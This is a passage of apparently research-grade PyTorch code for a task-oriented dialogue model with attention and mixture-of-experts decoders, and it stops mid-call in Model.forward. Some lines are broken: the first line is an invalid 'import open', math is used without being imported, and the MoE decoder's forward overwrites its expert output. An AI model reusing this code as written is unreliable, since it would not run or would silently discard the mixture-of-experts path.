import open\nfrom queue import PriorityQueue # for py3\nfrom functools import reduce # for py3\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\n\nimport models.policy as policy\n# pp added: used for PriorityQueue python3, add an extra para in .put() method\nfrom itertools import count\n\nunique = count()\n\nfrom utils.util import SOS_token, EOS_token, PAD_token, detected_device\n\nPAD_model = 0 # used for set 0 elements in tensor\ndefault_device = detected_device\n\n\n# SOS_token = 0\n# EOS_token = 1\n# UNK_token = 2\n# PAD_token = 3\n# use_moe_loss = True # inner models weighting loss\n# learn_loss_weight = True\n# use_moe_model = True # inner models structure partition\n#\n# pp added\n# @total_ordering\n# class PriorityElem:\n# def __init__(self, elem_to_wrap):\n# self.wrapped_elem = elem_to_wrap\n#\n# def __lt__(self, other):\n# return self.wrapped_elem.priority < other.wrapped_elem.priority\n\n# Shawn beam search decoding\nclass BeamSearchNode(object):\n def __init__(self, h, prevNode, wordid, logp, leng):\n self.h = h\n self.prevNode = prevNode\n self.wordid = wordid\n self.logp = logp\n self.leng = leng\n\n def eval(self, repeatPenalty, tokenReward, scoreTable, alpha=1.0):\n reward = 0\n alpha = 1.0\n\n return self.logp / float(self.leng - 1 + 1e-6) + alpha * reward\n\n\ndef init_lstm(cell, gain=1):\n init_gru(cell, gain)\n\n # positive forget gate bias (Jozefowicz et al., 2015)\n for _, _, ih_b, hh_b in cell.all_weights:\n l = len(ih_b)\n ih_b[l // 4:l // 2].data.fill_(1.0)\n hh_b[l // 4:l // 2].data.fill_(1.0)\n\n\ndef init_gru(gru, gain=1):\n gru.reset_parameters()\n for _, hh, _, _ in gru.all_weights:\n for i in range(0, hh.size(0), gru.hidden_size):\n torch.nn.init.orthogonal_(hh[i:i + gru.hidden_size], gain=gain)\n\n\ndef whatCellType(input_size, hidden_size, cell_type, dropout_rate):\n if cell_type == 'rnn':\n cell = nn.RNN(input_size, hidden_size, dropout=dropout_rate, batch_first=False)\n init_gru(cell)\n return cell\n elif cell_type == 'gru':\n cell = nn.GRU(input_size, hidden_size, dropout=dropout_rate, batch_first=False)\n init_gru(cell)\n return cell\n elif cell_type == 'lstm':\n cell = nn.LSTM(input_size, hidden_size, dropout=dropout_rate, batch_first=False)\n init_lstm(cell)\n return cell\n elif cell_type == 'bigru':\n cell = nn.GRU(input_size, hidden_size, bidirectional=True, dropout=dropout_rate, batch_first=False)\n init_gru(cell)\n return cell\n elif cell_type == 'bilstm':\n cell = nn.LSTM(input_size, hidden_size, bidirectional=True, dropout=dropout_rate, batch_first=False)\n init_lstm(cell)\n return cell\n\n\nclass EncoderRNN(nn.Module):\n def __init__(self, input_size, embedding_size, hidden_size, cell_type, depth, dropout, device=default_device):\n super(EncoderRNN, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.embed_size = embedding_size\n self.n_layers = depth\n self.dropout = dropout\n self.bidirectional = False\n if 'bi' in cell_type:\n self.bidirectional = True\n padding_idx = 3\n self.embedding = nn.Embedding(input_size, embedding_size, padding_idx=padding_idx)\n # self.embedding = nn.Embedding(400, embedding_size, padding_idx=padding_idx)\n self.rnn = whatCellType(embedding_size, hidden_size,\n cell_type, dropout_rate=self.dropout)\n self.device = device\n\n def forward(self, input_seqs, input_lens, hidden=None):\n \"\"\"\n forward procedure. **No need for inputs to be sorted**\n :param input_seqs: Variable of [T,B]\n :param hidden:\n :param input_lens: *numpy array* of len for each input sequence\n :return:\n \"\"\"\n input_lens = np.asarray(input_lens)\n input_seqs = input_seqs.transpose(0, 1)\n # batch_size = input_seqs.size(1)\n embedded = self.embedding(input_seqs)\n embedded = embedded.transpose(0, 1) # [B,T,E]\n sort_idx = np.argsort(-input_lens)\n # pp added\n unsort_idx = np.argsort(sort_idx)\n # unsort_idx = torch.LongTensor(np.argsort(sort_idx))\n input_lens = input_lens[sort_idx]\n # sort_idx = torch.LongTensor(sort_idx)\n embedded = embedded[sort_idx].transpose(0, 1) # [T,B,E]\n packed = torch.nn.utils.rnn.pack_padded_sequence(embedded, input_lens)\n outputs, hidden = self.rnn(packed, hidden)\n outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(outputs)\n if self.bidirectional:\n outputs = outputs[:, :, :self.hidden_size] + outputs[:, :, self.hidden_size:]\n\n outputs = outputs.transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n\n if isinstance(hidden, tuple):\n hidden = list(hidden)\n hidden[0] = hidden[0].transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n hidden[1] = hidden[1].transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n hidden = tuple(hidden)\n else:\n hidden = hidden.transpose(0, 1)[unsort_idx].transpose(0, 1).contiguous()\n\n return outputs, hidden\n\n\nclass Attn(nn.Module):\n def __init__(self, method, hidden_size, device=default_device):\n super(Attn, self).__init__()\n self.method = method\n self.hidden_size = hidden_size\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\n self.v = nn.Parameter(torch.rand(hidden_size))\n stdv = 1. / math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n self.device = device\n\n def forward(self, hidden, encoder_outputs):\n '''\n :param hidden:\n previous hidden state of the decoder, in shape (layers*directions,B,H)\n :param encoder_outputs:\n encoder outputs from Encoder, in shape (T,B,H)\n :return\n attention energies in shape (B,T)\n '''\n max_len = encoder_outputs.size(0)\n\n H = hidden.repeat(max_len, 1, 1).transpose(0, 1)\n encoder_outputs = encoder_outputs.transpose(0, 1) # [T,B,H] -> [B,T,H]\n attn_energies = self.score(H, encoder_outputs) # compute attention score\n return F.softmax(attn_energies, dim=1).unsqueeze(1) # normalize with softmax\n\n def score(self, hidden, encoder_outputs):\n cat = torch.cat([hidden, encoder_outputs], 2)\n energy = torch.tanh(self.attn(cat)) # [B*T*2H]->[B*T*H]\n energy = energy.transpose(2, 1) # [B*H*T]\n v = self.v.repeat(encoder_outputs.data.shape[0], 1).unsqueeze(1) # [B*1*H]\n energy = torch.bmm(v, energy) # [B*1*T]\n return energy.squeeze(1) # [B*T]\n\n\nclass SeqAttnDecoderRNN(nn.Module):\n def __init__(self, embedding_size, hidden_size, output_size, cell_type, dropout_p=0.1, max_length=30,\n device=default_device):\n super(SeqAttnDecoderRNN, self).__init__()\n # Define parameters\n self.hidden_size = hidden_size\n self.embed_size = embedding_size\n self.output_size = output_size\n self.n_layers = 1\n self.dropout_p = dropout_p\n self.device = device\n\n # Define layers\n self.embedding = nn.Embedding(output_size, embedding_size)\n self.dropout = nn.Dropout(dropout_p)\n\n if 'bi' in cell_type: # we dont need bidirectionality in decoding\n cell_type = cell_type.strip('bi')\n self.rnn = whatCellType(embedding_size + hidden_size, hidden_size, cell_type, dropout_rate=self.dropout_p)\n self.out = nn.Linear(hidden_size, output_size)\n\n self.score = nn.Linear(self.hidden_size + self.hidden_size, self.hidden_size)\n self.attn_combine = nn.Linear(embedding_size + hidden_size, embedding_size)\n\n # attention\n self.method = 'concat'\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\n self.v = nn.Parameter(torch.rand(hidden_size))\n stdv = 1. / math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n\n def forward(self, input, hidden, encoder_outputs, mask_tensor=None):\n if isinstance(hidden, tuple):\n h_t = hidden[0]\n else:\n h_t = hidden\n encoder_outputs = encoder_outputs.transpose(0, 1)\n embedded = self.embedding(input) # .view(1, 1, -1)\n # embedded = F.dropout(embedded, self.dropout_p)\n\n # SCORE 3\n max_len = encoder_outputs.size(1)\n h_t = h_t.transpose(0, 1) # [1,B,D] -> [B,1,D]\n h_t = h_t.repeat(1, max_len, 1) # [B,1,D] -> [B,T,D]\n energy = self.attn(torch.cat((h_t, encoder_outputs), 2)) # [B,T,2D] -> [B,T,D]\n energy = torch.tanh(energy)\n energy = energy.transpose(2, 1) # [B,H,T]\n v = self.v.repeat(encoder_outputs.size(0), 1).unsqueeze(1) # [B,1,H]\n energy = torch.bmm(v, energy) # [B,1,T]\n attn_weights = F.softmax(energy, dim=2) # [B,1,T]\n\n # getting context\n context = torch.bmm(attn_weights, encoder_outputs) # [B,1,H]\n\n # context = torch.bmm(attn_weights.unsqueeze(0), encoder_outputs.unsqueeze(0)) #[B,1,H]\n # Combine embedded input word and attended context, run through RNN\n rnn_input = torch.cat((embedded, context), 2)\n rnn_input = rnn_input.transpose(0, 1)\n\n output, hidden = self.rnn(rnn_input, hidden)\n output = output.squeeze(0) # (1,B,V)->(B,V)\n\n output = F.log_softmax(self.out(output), dim=1)\n return output, hidden # , attn_weights\n\n\nclass MoESeqAttnDecoderRNN(nn.Module):\n def __init__(self, embedding_size, hidden_size, output_size, cell_type, k=1, dropout_p=0.1, max_length=30,\n args=None, device=default_device):\n super(MoESeqAttnDecoderRNN, self).__init__()\n # Define parameters\n self.hidden_size = hidden_size\n self.embed_size = embedding_size\n self.output_size = output_size\n self.n_layers = 1\n self.dropout_p = dropout_p\n self.k = k\n self.device = device\n self.args = args\n # pp added: future info size\n self.future_size = self.output_size\n\n # Define layers\n self.embedding = nn.Embedding(output_size, embedding_size)\n self.dropout = nn.Dropout(dropout_p)\n\n if 'bi' in cell_type: # we dont need bidirectionality in decoding\n cell_type = cell_type.strip('bi')\n self.rnn = whatCellType(embedding_size + hidden_size, hidden_size, cell_type, dropout_rate=self.dropout_p)\n self.rnn_f = whatCellType(embedding_size + hidden_size, hidden_size, cell_type, dropout_rate=self.dropout_p) # pp added for future context\n # self.rnn_fp = whatCellType(embedding_size + hidden_size + output_size, hidden_size, cell_type, dropout_rate=self.dropout_p) # pp added for future context\n\n self.moe_rnn = whatCellType(hidden_size * (self.k + 1), hidden_size * (self.k + 1), cell_type,\n dropout_rate=self.dropout_p)\n self.moe_hidden = nn.Linear(hidden_size * (self.k + 1), hidden_size)\n # self.moe_fc = nn.Linear((output_size+hidden_size)*(self.k+1), (self.k+1))\n self.moe_fc = nn.Linear(output_size * (self.k + 1), (self.k + 1))\n # self.moe_fc_hid = nn.Linear(hidden_size*(self.k+1), (self.k+1))\n\n self.out = nn.Linear(hidden_size, output_size)\n self.score = nn.Linear(self.hidden_size + self.hidden_size, self.hidden_size)\n self.attn_combine = nn.Linear(embedding_size + hidden_size, embedding_size)\n\n # attention\n self.method = 'concat'\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\n\n # self.attn_fp = nn.Linear(self.hidden_size * 2 + self.output_size, hidden_size)\n self.attn_f = nn.Linear(self.hidden_size * 2 + self.future_size, hidden_size)\n self.v = nn.Parameter(torch.rand(hidden_size))\n stdv = 1. / math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n\n # self.attn_dec_hid = Attn(self.method, hidden_size, self.device)\n\n def expert_forward(self, input, hidden, encoder_outputs):\n if isinstance(hidden, tuple):\n h_t = hidden[0]\n else:\n h_t = hidden\n encoder_outputs = encoder_outputs.transpose(0, 1)\n\n embedded = self.embedding(input) # .view(1, 1, -1)\n # embedded = F.dropout(embedded, self.dropout_p)\n\n # SCORE 3\n max_len = encoder_outputs.size(1)\n h_t_reshaped = h_t.unsqueeze(0) if len(h_t.size()) == 2 else h_t # pp added: make sure h_t is [1,B,D]\n h_t = h_t_reshaped.transpose(0, 1) # [1,B,D] -> [B,1,D]\n h_t = h_t.repeat(1, max_len, 1) # [B,1,D] -> [B,T,D]\n\n energy = self.attn(torch.cat((h_t, encoder_outputs), 2)) # [B,T,2D] -> [B,T,D]\n energy = torch.tanh(energy)\n energy = energy.transpose(2, 1) # [B,H,T]\n v = self.v.repeat(encoder_outputs.size(0), 1).unsqueeze(1) # [B,1,H]\n energy = torch.bmm(v, energy) # [B,1,T]\n attn_weights = F.softmax(energy, dim=2) # [B,1,T]\n\n # getting context\n context = torch.bmm(attn_weights, encoder_outputs) # [B,1,H]\n\n # Combine embedded input word and attended context, run through RNN\n rnn_input = torch.cat((embedded, context), 2)\n rnn_input = rnn_input.transpose(0, 1)\n\n # pp added\n new_hid = h_t_reshaped\n if isinstance(hidden, tuple):\n if len(hidden) == 2:\n new_hid = (h_t_reshaped, hidden[1])\n # elif len(hidden)==1:\n # new_hid = (h_t_reshaped)\n\n output, hidden = self.rnn(rnn_input, new_hid) # hidden to h_t_reshaped\n output = output.squeeze(0) # (1,B,H)->(Batu,H)\n\n output = F.log_softmax(self.out(output), dim=1) # self.out(output)[batch, out_vocab]\n return output, hidden, embedded.transpose(0, 1) # , attn_weights\n\n def moe_layer(self, decoder_output_list, decoder_hidden_list, embedded_list, gamma_expert):\n # output\n chair_dec_out = decoder_output_list[0] # chair\n expert_dec_out_list = decoder_output_list[1:] # experts\n chair_dec_hid = decoder_hidden_list[0] # chair\n expert_dec_hid_list = decoder_hidden_list[1:] # experts\n # 1. only use decoder_output compute weights\n cat_dec_out = torch.cat(decoder_output_list, -1) # (B, (k+1)*V) # Experts\n # 2. use both decoder_output & decoder_hidden\n # cat_dec_list = [torch.cat((o, x.squeeze(0)), 1) for o, (x, y) in zip(decoder_output_list, decoder_hidden_list)]\n # cat_dec_out = torch.cat(cat_dec_list, -1)\n # MOE weights computation + normalization ------ Start\n moe_weights = self.moe_fc(cat_dec_out) # [Batch, Intent]\n moe_weights = F.log_softmax(moe_weights, dim=1)\n # moe_weights = F.softmax(moe_weights, dim=1)\n\n # available_m = torch.zeros(moe_weights.size(), device=self.device)\n # i = 0\n # for k in enumerate(decoder_output_list):\n # available_m[:,i] = mask_tensor[k]\n # i += 1\n # moe_weights = available_m * moe_weights\n\n norm_weights = torch.sum(moe_weights, dim=1)\n norm_weights = norm_weights.unsqueeze(1)\n moe_weights = torch.div(moe_weights, norm_weights) # [B, I]\n moe_weights = moe_weights.permute(1, 0).unsqueeze(-1) # [I, B, 1]; debug:[8,2,1]\n # MOE weights computation + normalization ------ End\n # output\n moe_weights_output = moe_weights.expand(-1, -1, decoder_output_list[0].size(-1)) # [I, B, V]; [8,2,400]\n decoder_output_tensor = torch.stack(decoder_output_list) # [I, B, V]\n output = decoder_output_tensor.mul(moe_weights_output).sum(0) # [B, V]; [2, 400]\n # weighting\n output = gamma_expert * output + (1 - gamma_expert) * chair_dec_out # [2, 400]\n # hidden\n moe_weights_hidden = moe_weights.expand(-1, -1, decoder_hidden_list[0][0].size(-1)) # [I, B, H]; [8,2,5]\n if isinstance(decoder_hidden_list[0], tuple): # for lstm\n stack_dec_hid = torch.stack([a.squeeze(0) for a, b in decoder_hidden_list]), torch.stack(\n [b.squeeze(0) for a, b in decoder_hidden_list]) # [I, B, H]\n hidden = stack_dec_hid[0].mul(moe_weights_hidden).sum(0).unsqueeze(0), stack_dec_hid[1].mul(\n moe_weights_hidden).sum(0).unsqueeze(0) # [B, H]\n hidden = gamma_expert * hidden[0] + (1 - gamma_expert) * chair_dec_hid[0], gamma_expert * hidden[1] + (\n 1 - gamma_expert) * chair_dec_hid[1]\n else: # for gru\n stack_dec_hid = torch.stack([a.squeeze(0) for a in decoder_hidden_list])\n hidden = stack_dec_hid[0].mul(moe_weights_hidden).sum(0).unsqueeze(0)\n hidden = gamma_expert * hidden[0] + (1 - gamma_expert) * chair_dec_hid[0]\n hidden = hidden.unsqueeze(0)\n # print('hidden=', hidden.size())\n return output, hidden # output[B, V] -- [2, 400] ; hidden[1, B, H] -- [1, 2, 5]\n\n def tokenMoE(self, decoder_input, decoder_hidden, encoder_outputs, mask_tensor):\n # decoder_input[batch, 1]; decoder_hidden: tuple element is a tensor[1, batch, hidden], encoder_outputs[maxlen_target, batch, hidden]\n # n = len(self.intent_list) # how many intents do we have\n output_c, hidden_c, embedded_c = self.expert_forward(input=decoder_input, hidden=decoder_hidden,\n encoder_outputs=encoder_outputs)\n decoder_output_list, decoder_hidden_list, embedded_list = [output_c], [hidden_c], [embedded_c]\n # decoder_output_list, decoder_hidden_list, embedded_list = [], [], []\n # count = 0\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n decoder_input_k = decoder_input.clone().masked_fill_(mask,\n value=PAD_model) # if assigned PAD_token it will count loss\n if isinstance(decoder_hidden, tuple):\n decoder_hidden_k = tuple(map(lambda x: x.clone().masked_fill_(mask, value=PAD_model), decoder_hidden))\n else:\n decoder_hidden_k = decoder_hidden.clone().masked_fill_(mask, value=PAD_model)\n encoder_outputs_k = encoder_outputs.clone().masked_fill_(mask, value=PAD_model)\n # test if there's someone not all PADDED\n # if torch.min(decoder_input_k)!=PAD_token or torch.min(decoder_hidden_k[0])!=PAD_token or torch.min(decoder_hidden_k[1])!=PAD_token or torch.min(encoder_outputs_k)!=PAD_token:\n # print(decoder_input_k, '\\n', decoder_hidden_k,'\\n', encoder_outputs_k)\n # count += 1\n output_k, hidden_k, embedded_k = self.expert_forward(input=decoder_input_k, hidden=decoder_hidden_k,\n encoder_outputs=encoder_outputs_k)\n\n decoder_output_list.append(output_k)\n decoder_hidden_list.append(hidden_k)\n embedded_list.append(embedded_k)\n\n # print('count=', count) # 10/31 will count for loss\n gamma_expert = self.args.gamma_expert\n decoder_output, decoder_hidden = self.moe_layer(decoder_output_list, decoder_hidden_list, embedded_list,\n gamma_expert)\n # decoder_output = gamma_expert * decoder_output + (1 - gamma_expert) * output_c\n # decoder_hidden = gamma_expert * decoder_hidden + (1 - gamma_expert) * hidden_c\n # output = output.squeeze(0) # (1,B,H)->(B,H)\n # output = F.log_softmax(self.out(output), dim=1) # self.out(output)[batch, out_vocab]\n return decoder_output, decoder_hidden\n\n def pros_expert_forward(self, input, hidden, encoder_outputs, dec_hidd_with_future):\n if isinstance(hidden, tuple):\n h_t = hidden[0]\n else:\n h_t = hidden\n encoder_outputs = encoder_outputs.transpose(0, 1)\n\n embedded = self.embedding(input) # .view(1, 1, -1)\n # embedded = F.dropout(embedded, self.dropout_p)\n\n # SCORE 3\n max_len = encoder_outputs.size(1)\n h_t0 = h_t.transpose(0, 1) # [1,B,D] -> [B,1,D]\n h_t = h_t0.repeat(1, max_len, 1) # [B,1,D] -> [B,T,D]\n\n # pp added: new attn\n energy = self.attn_f(torch.cat((h_t, encoder_outputs, dec_hidd_with_future[:max_len].transpose(0, 1)), 2)) # [B,T,2D] -> [B,T,D]\n energy = torch.tanh(energy)\n energy = energy.transpose(2, 1) # [B,H,T]\n v = self.v.repeat(encoder_outputs.size(0), 1).unsqueeze(1) # [B,1,H]\n energy = torch.bmm(v, energy) # [B,1,T]\n attn_weights = F.softmax(energy, dim=2) # [B,1,T]\n\n # getting context\n context = torch.bmm(attn_weights, encoder_outputs) # [B,1,H]\n\n # Combine embedded input word and attended context, run through RNN\n rnn_input = torch.cat((embedded, context), 2)\n rnn_input = rnn_input.transpose(0, 1)\n output, hidden = self.rnn(rnn_input, hidden) # if self.args.rp_share_rnn else self.rnn_f(rnn_input, hidden)\n output = output.squeeze(0) # (1,B,H)->(B,H)\n\n output = F.log_softmax(self.out(output), dim=1) # self.out(output)[batch, out_vocab]\n return output, hidden, embedded.transpose(0, 1) # , attn_weights\n\n def prospectiveMoE(self, decoder_input, decoder_hidden, encoder_outputs, mask_tensor, dec_hidd_with_future):\n # count = 1\n # print('count=', count)\n output_c, hidden_c, embedded_c = self.pros_expert_forward(decoder_input, decoder_hidden, encoder_outputs,\n dec_hidd_with_future)\n decoder_output_list, decoder_hidden_list, embedded_list = [output_c], [hidden_c], [embedded_c]\n\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n # count += 1\n # print('count=', count)\n decoder_input_k = decoder_input.clone().masked_fill_(mask,\n value=PAD_model) # if assigned PAD_token it will count loss\n if isinstance(decoder_hidden, tuple):\n decoder_hidden_k = tuple(map(lambda x: x.clone().masked_fill_(mask, value=PAD_model), decoder_hidden))\n else:\n decoder_hidden_k = decoder_hidden.clone().masked_fill_(mask, value=PAD_model)\n encoder_outputs_k = encoder_outputs.clone().masked_fill_(mask, value=PAD_model)\n dec_hidd_with_future_k = dec_hidd_with_future.clone().masked_fill_(mask, value=PAD_model)\n output_k, hidden_k, embedded_k = self.pros_expert_forward(decoder_input_k, decoder_hidden_k,\n encoder_outputs_k, dec_hidd_with_future_k)\n\n decoder_output_list.append(output_k)\n decoder_hidden_list.append(hidden_k)\n embedded_list.append(embedded_k)\n\n gamma_expert = self.args.gamma_expert\n decoder_output, decoder_hidden = self.moe_layer(decoder_output_list, decoder_hidden_list, embedded_list,\n gamma_expert)\n return decoder_output, decoder_hidden\n\n def forward(self, input, hidden, encoder_outputs, mask_tensor, dec_hidd_with_future=None):\n if mask_tensor is not None:\n if dec_hidd_with_future is None: # don not use future prediction\n output, hidden = self.tokenMoE(input, hidden, encoder_outputs, mask_tensor)\n else:\n output, hidden = self.prospectiveMoE(input, hidden, encoder_outputs, mask_tensor, dec_hidd_with_future)\n else:\n pass\n output, hidden, _ = self.expert_forward(input, hidden, encoder_outputs)\n return output, hidden # , mask_tensor # , attn_weights\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, embedding_size, hidden_size, output_size, cell_type, dropout=0.1, device=default_device):\n super(DecoderRNN, self).__init__()\n self.device = device\n self.hidden_size = hidden_size\n self.cell_type = cell_type\n padding_idx = 3\n self.embedding = nn.Embedding(num_embeddings=output_size,\n embedding_dim=embedding_size,\n padding_idx=padding_idx\n )\n if 'bi' in cell_type: # we dont need bidirectionality in decoding\n cell_type = cell_type.strip('bi')\n self.rnn = whatCellType(embedding_size, hidden_size, cell_type, dropout_rate=dropout)\n self.dropout_rate = dropout\n self.out = nn.Linear(hidden_size, output_size)\n\n def forward(self, input, hidden, not_used, mask_tensor=None):\n embedded = self.embedding(input).transpose(0, 1) # [B,1] -> [ 1,B, D]\n embedded = F.dropout(embedded, self.dropout_rate)\n\n output = embedded\n # output = F.relu(embedded)\n\n output, hidden = self.rnn(output, hidden)\n\n out = self.out(output.squeeze(0))\n output = F.log_softmax(out, dim=1)\n\n return output, hidden\n\n\nclass Model(nn.Module):\n def __init__(self, args, input_lang_index2word, output_lang_index2word, input_lang_word2index,\n output_lang_word2index, intent2index=None, index2intent=None, device=default_device):\n super(Model, self).__init__()\n self.args = args\n self.max_len = args.max_len\n\n self.output_lang_index2word = output_lang_index2word\n self.input_lang_index2word = input_lang_index2word\n\n self.output_lang_word2index = output_lang_word2index\n self.input_lang_word2index = input_lang_word2index\n\n # pp added\n self.intent2index, self.index2intent = intent2index, index2intent\n self.k = len(self.intent2index) if self.intent2index else 1\n\n self.hid_size_enc = args.hid_size_enc\n self.hid_size_dec = args.hid_size_dec\n self.hid_size_pol = args.hid_size_pol\n\n self.emb_size = args.emb_size\n self.db_size = args.db_size\n self.bs_size = args.bs_size\n self.cell_type = args.cell_type\n if 'bi' in self.cell_type:\n self.num_directions = 2\n else:\n self.num_directions = 1\n self.depth = args.depth\n self.use_attn = args.use_attn\n self.attn_type = args.attention_type\n\n self.dropout = args.dropout\n self.device = device\n\n self.model_dir = args.model_dir\n self.pre_model_dir = args.pre_model_dir\n self.model_name = args.model_name\n self.teacher_forcing_ratio = args.teacher_ratio\n self.vocab_size = args.vocab_size\n self.epsln = 10E-5\n\n torch.manual_seed(args.seed)\n self.build_model()\n self.getCount()\n try:\n assert self.args.beam_width > 0\n self.beam_search = True\n except:\n self.beam_search = False\n\n self.global_step = 0\n\n def cuda_(self, var):\n return var.cuda() if self.args.cuda else var\n\n def build_model(self):\n self.encoder = EncoderRNN(len(self.input_lang_index2word), self.emb_size, self.hid_size_enc,\n self.cell_type, self.depth, self.dropout)\n\n self.policy = policy.DefaultPolicy(self.hid_size_pol, self.hid_size_enc, self.db_size, self.bs_size)\n\n # pp added: intent_type branch\n if self.args.intent_type and self.args.use_moe_model:\n self.decoder = MoESeqAttnDecoderRNN(self.emb_size, self.hid_size_dec, len(self.output_lang_index2word),\n self.cell_type, self.k, self.dropout, self.max_len, self.args)\n elif self.use_attn:\n if self.attn_type == 'bahdanau':\n self.decoder = SeqAttnDecoderRNN(self.emb_size, self.hid_size_dec, len(self.output_lang_index2word),\n self.cell_type, self.dropout, self.max_len)\n else:\n self.decoder = DecoderRNN(self.emb_size, self.hid_size_dec, len(self.output_lang_index2word),\n self.cell_type, self.dropout)\n\n if self.args.mode == 'train':\n self.gen_criterion = nn.NLLLoss(ignore_index=PAD_token,\n reduction='mean') # logsoftmax is done in decoder part\n self.setOptimizers()\n\n # pp added\n self.moe_loss_layer = nn.Linear(1 * (self.k + 1), 1)\n\n def model_train(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None, dial_name=None):\n\n proba, _, decoded_sent = self.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: acts_list\n\n proba = proba.view(-1, self.vocab_size)\n\n self.gen_loss = self.gen_criterion(proba, target_tensor.view(-1))\n\n if self.args.use_moe_loss and mask_tensor is not None: # data separate by intents:\n gen_loss_list = []\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n target_tensor_i = target_tensor.clone()\n target_tensor_i = target_tensor_i.masked_fill_(mask, value=PAD_token)\n loss_i = self.gen_criterion(proba, target_tensor_i.view(-1))\n gen_loss_list.append(loss_i)\n\n if self.args.learn_loss_weight:\n gen_loss_list.append(self.gen_loss)\n gen_loss_tensor = torch.as_tensor(torch.stack(gen_loss_list), device=self.device)\n self.gen_loss = self.moe_loss_layer(gen_loss_tensor)\n else: # hyper weights\n # lambda_expert = 0.5\n lambda_expert = self.args.lambda_expert\n self.gen_loss = (1 - lambda_expert) * self.gen_loss + \\\n lambda_expert * torch.mean(torch.tensor(gen_loss_list))\n self.loss = self.gen_loss\n self.loss.backward()\n grad = self.clipGradients()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n # self.printGrad()\n return self.loss.item(), 0, grad\n\n def setOptimizers(self):\n self.optimizer_policy = None\n if self.args.optim == 'sgd':\n self.optimizer = optim.SGD(lr=self.args.lr_rate,\n params=filter(lambda x: x.requires_grad, self.parameters()),\n weight_decay=self.args.l2_norm)\n elif self.args.optim == 'adadelta':\n self.optimizer = optim.Adadelta(lr=self.args.lr_rate,\n params=filter(lambda x: x.requires_grad, self.parameters()),\n weight_decay=self.args.l2_norm)\n elif self.args.optim == 'adam':\n self.optimizer = optim.Adam(lr=self.args.lr_rate,\n params=filter(lambda x: x.requires_grad, self.parameters()),\n weight_decay=self.args.l2_norm)\n\n def retro_forward(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None, if_detach=False): # pp added: acts_list\n \"\"\"Given the user sentence, user belief state and database pointer,\n encode the sentence, decide what policy vector construct and\n feed it as the first hiddent state to the decoder.\n input_tensor: tensor(batch, maxlen_input)\n target_tensor: tensor(batch, maxlen_target)\n \"\"\"\n\n target_length = target_tensor.size(1) if target_tensor is not None else self.args.max_len\n\n # for fixed encoding this is zero so it does not contribute\n batch_size, seq_len = input_tensor.size()\n\n # ENCODER\n encoder_outputs, encoder_hidden = self.encoder(input_tensor,\n input_lengths) # encoder_outputs: tensor(maxlen_input, batch, 150); encoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n\n # pp added: extract forward output of encoder if use SentMoE and 2 directions\n if self.num_directions == 2 and self.args.SentMoE:\n if isinstance(encoder_hidden, tuple):\n # pp added: forward or backward\n encoder_hidden = encoder_hidden[0][0].unsqueeze(0), encoder_hidden[1][0].unsqueeze(0)\n # encoder_hidden = encoder_hidden[0][1].unsqueeze(0), encoder_hidden[1][1].unsqueeze(0)\n else:\n encoder_hidden = encoder_hidden[0].unsqueeze(0)\n\n # POLICY\n decoder_hidden = self.policy(encoder_hidden, db_tensor, bs_tensor,\n self.num_directions) # decoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n # print('decoder_hidden', decoder_hidden.size())\n # GENERATOR\n # Teacher forcing: Feed the target as the next input\n # _, target_len = target_tensor.size()\n\n decoder_input = torch.as_tensor([[SOS_token] for _ in range(batch_size)], dtype=torch.long,\n device=self.device) # tensor[batch, 1]\n # decoder_input = torch.LongTensor([[SOS_token] for _ in range(batch_size)], device=self.device)\n\n # pp added: calculate new batch size\n proba = torch.zeros(batch_size, target_length, self.vocab_size,\n device=self.device) # tensor[Batch, maxlen_target, V]\n hidd = torch.zeros(batch_size, target_length, self.hid_size_dec, device=self.device)\n\n # generate target sequence step by step !!!\n for t in range(target_length):\n # pp added: moe chair\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs,\n mask_tensor) # decoder_output; decoder_hidden\n\n # use_teacher_forcing = True if random.random() < self.args.teacher_ratio else False # pp added: self.args.SentMoE is False\n # use_teacher_forcing = True if random.random() < self.args.teacher_ratio and self.args.SentMoE is False else False # pp added: self.args.SentMoE is False\n if target_tensor is not None: # if use SentMoE, we should stop teacher forcing for experts\n decoder_input = target_tensor[:, t].view(-1, 1) # [B,1] Teacher forcing\n else:\n # Without teacher forcing: use its own predictions as the next input\n topv, topi = decoder_output.topk(1)\n # decoder_input = topi.squeeze().detach() # detach from history as input\n decoder_input = topi.detach() # detach from history as input\n\n proba[:, t,\n :] = decoder_output # decoder_output[Batch, TargetVocab] # proba[Batch, Target_MaxLen, Target_Vocab]\n # pp added\n if isinstance(decoder_hidden, tuple):\n hidd0 = decoder_hidden[0]\n else:\n hidd0 = decoder_hidden\n hidd[:, t, :] = hidd0\n\n decoded_sent = None\n # pp added: GENERATION\n # decoded_sent = self.decode(target_tensor, decoder_hidden, encoder_outputs, mask_tensor)\n\n if if_detach:\n proba, hidd = proba.detach(), hidd.detach()\n return proba, hidd, decoded_sent\n\n def forward(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None): # pp added: acts_list\n\n # if we consider sentence info\n if self.args.SentMoE:\n proba_r, hidd, decoded_sent = self.retro_forward(input_tensor, 